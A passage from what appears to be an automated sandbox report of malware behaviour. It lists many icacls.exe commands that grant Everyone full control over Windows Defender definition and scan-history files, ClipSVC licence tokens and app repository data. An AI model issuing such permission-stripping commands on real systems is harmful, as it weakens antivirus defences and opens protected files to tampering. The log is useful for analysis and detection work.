  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\18\107002 /grant Everyone:F /T /C /Q
  2⤵
  PID:9768
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\17\109001 /grant Everyone:F /T /C /Q
  2⤵
  PID:13976
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\17\193 /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:7404
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\15\262 /grant Everyone:F /T /C /Q
  2⤵
  PID:13596
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\11\200 /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:14608
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\05\191 /grant Everyone:F /T /C /Q
  2⤵
  PID:9072
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\01\198 /grant Everyone:F /T /C /Q
  2⤵
  PID:13600
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\00\192 /grant Everyone:F /T /C /Q
  2⤵
  PID:13488
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\CacheManager\0E932F02-0000-0000-0000-500600000000-0.bin /grant Everyone:F /T /C /Q
  2⤵
  PID:7672
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\01\271 /grant Everyone:F /T /C /Q
  2⤵
  PID:8144
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Network Inspection System\Support\NisLog.txt /grant Everyone:F /T /C /Q
  2⤵
  PID:7036
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Definition Updates\Default\MpAsBase.vdm /grant Everyone:F /T /C /Q
  2⤵
  PID:9124
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Definition Updates\Default\MpAsDlta.vdm /grant Everyone:F /T /C /Q
  2⤵
  PID:7052
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Definition Updates\Default\MpAvBase.vdm /grant Everyone:F /T /C /Q
  2⤵
  PID:7060
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Definition Updates\Default\MpAvDlta.vdm /grant Everyone:F /T /C /Q
  2⤵
  PID:6800
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Definition Updates\Default\NisBase.vdm /grant Everyone:F /T /C /Q
  2⤵
  PID:12040
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Definition Updates\Default\NisFull.vdm /grant Everyone:F /T /C /Q
  2⤵
  PID:13572
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppxProvisioning.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:9180
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\wfp\wfpdiag.etl /grant Everyone:F /T /C /Q
  2⤵
  PID:14000
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Java Development Kit\Reference Documentation.url /grant Everyone:F /T /C /Q
  2⤵
  PID:16340
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Java\Get Help.url /grant Everyone:F /T /C /Q
  2⤵
  PID:9348
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Java\Visit Java.com.url /grant Everyone:F /T /C /Q
  2⤵
  PID:12900
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Packages\Microsoft.MicrosoftRetailDemoProvisioning_8wekyb3d8bbwe\Microsoft.MicrosoftRetailDemoProvisioning_8wekyb3d8bbwe.appx /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:9128
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Packages\Microsoft.MicrosoftRetailDemoProvisioning_8wekyb3d8bbwe\Microsoft.MicrosoftRetailDemoProvisioning_8wekyb3d8bbwe_License.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:9536
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Packages\Microsoft.MicrosoftRetailDemoProvisioning_8wekyb3d8bbwe\Microsoft.NET.Native.Runtime.1.1.DemoProvisioning.appx /grant Everyone:F /T /C /Q
  2⤵
  PID:6080
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Packages\Microsoft.MicrosoftRetailDemoProvisioning_8wekyb3d8bbwe\Microsoft.VCLibs.x64.14.00.DemoProvisioning.appx /grant Everyone:F /T /C /Q
  2⤵
  PID:7624
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Packages\Microsoft.DemoHub_8wekyb3d8bbwe\Microsoft.DemoHub_8wekyb3d8bbwe.appx /grant Everyone:F /T /C /Q
  2⤵
  PID:9740
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Packages\Microsoft.DemoHub_8wekyb3d8bbwe\Microsoft.DemoHub_8wekyb3d8bbwe_License.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:8024
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Packages\Microsoft.DemoHub_8wekyb3d8bbwe\Microsoft.NET.Native.Runtime.1.1.DemoHub.appx /grant Everyone:F /T /C /Q
  2⤵
  PID:9788
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Packages\Microsoft.DemoHub_8wekyb3d8bbwe\Microsoft.VCLibs.x64.14.00.DemoHub.appx /grant Everyone:F /T /C /Q
  2⤵
  PID:5784
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Packages\Microsoft.BasicAttractLoop_8wekyb3d8bbwe\Microsoft.BasicAttractLoop_8wekyb3d8bbwe.appx /grant Everyone:F /T /C /Q
  2⤵
  PID:6168
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Packages\Microsoft.BasicAttractLoop_8wekyb3d8bbwe\Microsoft.BasicAttractLoop_8wekyb3d8bbwe_License.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:9288
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Packages\Microsoft.BasicAttractLoop_8wekyb3d8bbwe\Microsoft.NET.Native.Runtime.1.1.BasicAttractLoop.appx /grant Everyone:F /T /C /Q
  2⤵
  PID:8004
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Packages\Microsoft.BasicAttractLoop_8wekyb3d8bbwe\Microsoft.VCLibs.x64.14.00.BasicAttractLoop.appx /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:6616
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Microsoft\Content\Neutral\AppList\AppList.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:5576
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\Office\ConfigureO16DemoMode.bat /grant Everyone:F /T /C /Q
  2⤵
  PID:16372
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Microsoft\Content\Neutral\AppList\AppList.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:9516
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\Office\ConfigureO16DemoModeJapanese.bat /grant Everyone:F /T /C /Q
  2⤵
  PID:9428
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\LfSvc\Geofence\GeofenceApplicationID.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:13392
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\DeviceMetadataStore\en-US\34e548a8-3268-4dde-bedf-c40f9b6c814a.devicemetadata-ms /grant Everyone:F /T /C /Q
  2⤵
  PID:13440
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\DeviceMetadataStore\en-US\63921eef-8415-4368-9201-f0df4af5778f.devicemetadata-ms /grant Everyone:F /T /C /Q
  2⤵
  PID:12872
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\DeviceMetadataCache\dmrc.idx /grant Everyone:F /T /C /Q
  2⤵
  PID:9236
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\tokens.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:5732
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\02305155-8ac1-1189-ff55-b7119a53887c.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:7960
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\03f8974b-362e-33e3-2e0b-c7bc2ea01c63.xml /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:8348
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\0890ad2f-b74f-c384-f684-9c33f8f67924.xml /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:8356
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\09ec127d-8158-a906-c12f-44a86e3e994f.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:10216
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\0a8c1492-65ca-6a01-de25-0e183559d10d.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:6184
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\135b8585-669d-61bf-dfb4-e6db0d77665d.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:7400
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\13ba8772-845b-29a1-ae9e-fb2793ccf4ea.xml /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:7164
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\198ac17f-9072-e378-c878-c6ceedffa1a2.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:7936
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\1dae14df-4c42-28af-691e-10cc07a990b4.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:8052
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\1e225998-faa0-5fd4-4db7-5e7686ee3b47.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:7440
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\215f9712-9fca-a3f8-5b11-660eefc73b96.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:6820
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\2657f7c0-8294-58c3-f394-15fe18ba174a.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:5692
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\26943e1f-42ed-f190-2895-3bc2b8c4176d.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:7828
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\28502d06-9d29-8514-1e5d-64447116d798.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:7808
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\28748306-9f02-a5d7-6ded-4459fddadc31.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:4368
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\2a3adcd0-4ddc-f3d2-6bcb-f11f9cbc1e2c.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:9492
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\391e9bee-1102-f683-107b-a19524dda8b7.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:14948
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\3c8c7eb3-7a1d-7981-0472-571cdd1d1292.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:6348
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\3ebdb897-991b-934f-ee13-2ca21ed81938.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:9896
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\3ebdb897-991b-934f-ee13-2ca21ed81938.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:16452
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\3f586f55-284b-e455-06b2-84c84e8d0d2d.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:8032
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\4c4ecbc0-0ec0-3929-aebb-a931a339fb23.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:5604
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\517cfcaf-138b-1796-2cea-62892204250a.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:5860
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\5b0a39aa-16e0-a938-f694-656664c7be15.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:14392
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\600364a7-e11c-efda-2c12-eac40e75f19a.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:8132
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\61b5bd89-4cb0-db77-6622-cb63b5a58080.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:9804
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\630a70e7-1832-4f42-e2a2-5d35fdddc45f.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:11984
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\67447b0c-05cf-6740-5f7b-391ab440c42d.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:5636
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\6e90ed81-9187-fa62-ce90-f18d7bed6b12.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:14448
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\71c8f37a-a7b9-aff0-6de0-9b276c089ad6.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:8168
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\71ef3df1-f4b1-69cd-793a-48e165e282aa.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:11100
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\7309084a-bb6f-20c3-ea54-aa108ceab1ae.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:5420
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\7646fa0f-b52c-71a8-3aed-950dd1668c09.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:8372
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\8292682a-6850-c06c-9b6d-9646f16d4ed0.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:8460
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\865e8f30-20a1-9528-bb48-42999b5b2aa8.xml /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:9728
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\8ce3d3dd-a4c7-6c38-5fde-1f9f5df98807.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:16488
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\8d56e57b-8663-136d-ff69-a004e217825a.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:12172
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\8e383e90-b2f9-7bf2-1d5b-4e47dcb2014e.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:16432
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\9d3ad23c-c6b8-7fb5-e4ab-f5d0a66dcfbc.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:15276
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\a1e5b165-0532-a6a3-f542-0c5c162be3e1.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:6676
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\a7e08b8b-ad4b-af00-ebcc-1aa29a833ce9.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:14508
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\ac116a72-b6b1-d558-23f6-10796e634d41.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:15676
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\b34b197c-c0ed-bf12-c9bb-44e883c66a9d.xml /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:11588
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\b81d7e70-84e7-b16a-e3d0-1e7aa2f1232d.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:15484
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\bbc7a1c3-44c6-27b6-1e16-487a47263f3e.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:6656
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\bbfbe8ad-1a35-a7f3-33bc-40912bf89dfb.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:8544
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\bcda97bb-bfd0-2a72-3c90-c8518f3d09ee.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:15180
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\c3d42a1a-2f3f-a4a9-6a04-cc1b234485fb.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:15560
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\c94a6c18-d496-da1c-8a02-fc6976e0145e.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:15600
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\ca947da2-7e9a-7249-8095-bceb379c6f74.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:4688
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\cb692946-a9f3-639d-1064-a6d75a01b9c3.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:13080
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\d1ecfce2-f845-c1e9-052b-d2f457c135e6.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:11016
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\d508ba05-d8aa-2836-484d-3833d22fe185.xml /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:11080
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\d90ad1eb-bec3-18c1-8c97-eef683ba6a1f.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:13300
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\e2a686b1-b02a-b3e7-90cb-3fa0d708ce04.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:9324
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\d90ad1eb-bec3-18c1-8c97-eef683ba6a1f.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:11592
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\e335baf1-18ab-73fe-e089-3fa0a6e71a35.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:8036
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\e335baf1-18ab-73fe-e089-3fa0a6e71a35.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:15204
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\e64ffef1-e246-b632-595b-56076a3fa776.xml /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:13308
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\e8fff2df-6041-8f21-3df7-db31661aa09b.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:8708
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\ecbc2601-0a67-4963-e594-43c65d6ec9a5.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:5760
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\e8ac9388-7c9c-19cc-fd4d-cb72bb1544ea.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:16520
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\eee47229-947d-2ac7-e8a3-49bafee251d1.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:15628
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\f1bb69b5-a7d1-df8f-5820-49f387fd5d2e.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:5544
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\fc93b452-8a84-dede-3b7a-0fc9413c4592.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:5016
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000001.db /grant Everyone:F /T /C /Q
  2⤵
  PID:9944
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Caches\cversions.2.db /grant Everyone:F /T /C /Q
  2⤵
  PID:10820
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Caches\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db /grant Everyone:F /T /C /Q
  2⤵
  PID:7296
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\f1bb69b5-a7d1-df8f-5820-49f387fd5d2e.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:8648
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\1527c705-839a-4832-9118-54d4Bd6a0c89_10.0.15063.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:10592
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\c5e2524a-ea46-4f67-841f-6a9465d9d515_10.0.15063.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:8472
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\CortanaListenUIApp_10.0.15063.0_neutral__cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:15544
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\DesktopLearning_1000.15063.0.0_neutral__cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:6532
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\DesktopView_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:17360
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\E2A4F912-2574-4A75-9BB0-0D023378592B_10.0.15063.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:6024
- C:\Windows\SYSTEM32\icacls.exe
